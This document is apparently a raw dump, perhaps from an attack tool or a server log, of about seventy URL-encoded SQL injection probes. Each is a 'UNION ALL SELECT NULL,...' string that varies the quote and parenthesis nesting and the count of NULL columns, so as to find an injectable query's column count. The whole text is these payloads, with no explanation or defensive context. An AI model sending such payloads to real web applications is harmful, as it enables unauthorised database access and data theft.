1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 